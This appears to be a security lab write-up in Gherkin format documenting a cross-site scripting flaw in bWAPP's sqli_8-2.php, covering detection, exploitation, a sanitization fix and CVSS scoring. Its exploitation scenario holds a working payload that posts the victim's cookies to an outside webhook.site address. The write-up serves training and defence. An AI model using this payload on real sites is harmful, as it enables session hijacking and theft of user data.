## Version 1.4.0
## language: en

Feature:
  TOE:
    bWAPP
  Category:
    Other bugs
  Page name:
    bwapp/sqli_8-2.php
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting')
  Goal:
    run arbitrary js in the target site
  Recommendation:
    Sanitize your inputs before displaying them

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
    | beebox                | 1.6       |
  TOE information:
    Given I am running bWAPP on a beebox VM via VirtualBox on http://bwapp

  Scenario: Normal use case
    Given I send a POST request to the url with the expected data
    """
    <reset>
        <login>bee</login>
        <secret>Any bugs?</secret>
    </reset>
    """
    Then I get a response with plain text saying
    """
    bee's secret has been reset!
    """

  Scenario: Static detection
  The input is not being sanitized in any way
    When I look at the code
    """
    24  $body = file_get_contents("php://input");
    25
    26  // If the security level is not MEDIUM or HIGH
    27  if($_COOKIE["security_level"] != "1"
        && $_COOKIE["security_level"] != "2")
    28  {
    29
    30  ini_set("display_errors",1);
    31
    32  $xml = simplexml_load_string($body);
    33
    34  // Debugging
    35  // print_r($xml);
    36
    37  $login = $xml->login;
    38  $secret = $xml->secret;
    39
    40  if($login && $login != "" && $secret)
    41  {
    42
    43      $sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '"
            . $login . "'";
    44
    45      // Debugging
    46      // echo $sql;
    47
    48      $recordset = $link->query($sql);
    49
    50      if(!$recordset)
    51      {
    52
    53          die("Connect Error: " . $link->error);
    54
    55      }
    56
    57      $message = $login . "'s secret has been reset!";
    58
    59  }
    """
    Then I can see that the vulnerability is caused by passing $login directly
    And displaying it without sanitization or validation
    Then I can conclude there should be an XSS vulnerability

  Scenario: Dynamic detection
  I can execute arbitrary js code when a user visits the Page
    Given I intercept a POST request for the URL with BurpSuite
    And I see the request data
    """
    ...
    <reset>
        <login>bee</login>
        <secret>Any bugs?</secret>
    </reset>
    """
    Then I change it to contain a js payload in the field to be displayed:
    """
    ...
    <reset>
        <login>bee <![CDATA[<script>alert(1)</script>]]></login>
        <secret>Any bugs?</secret>
    </reset>

    """
    Then I get a js alert as shown in [evidence](alert.png)
    Then I can conclude that there is an XSS vulnerability

  Scenario: Exploitation
  Leak user data through XSS
    Given I can execute my js code via the found XSS
    And I make it post the user's cookies to a site I control

    """
    ...
    <reset>
        <login>bee <![CDATA[<script>const Http = new XMLHttpRequest();
        Http.open("POST",
        "https://webhook.site/7610b094-18e7-4583-828a-22791c783266");
        Http.send(document.cookie);
        </script>]]></login>
        <secret>Any bugs?</secret>
    </reset>
    """
    Then I can see the user cookie data for the target site [evidence](data.png)
    Then I can use this data as I see fit

  Scenario: Remediation
  Sanitize the data to be displayed
    Given I have patched the code by sanitizing the input data
    """
    32  $xml = simplexml_load_string($body);
    33
    34  // Debugging
    35  // print_r($xml);
    36
    37  $login = filter_var($xml->login, FILTER_SANITIZE_STRING);
    38  $secret = filter_var($xml->secret, FILTER_SANITIZE_STRING)
    39
    """
    Then I re-run my exploit and get the response
    """
    bee alert(1)'s secret has been reset!
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    4.3/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.1/10 (Medium) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    5.7/10 (Medium) - CR:L/IR:L/AR:H

  Scenario: Correlations
    No correlations have been found to this date 2018-12-04
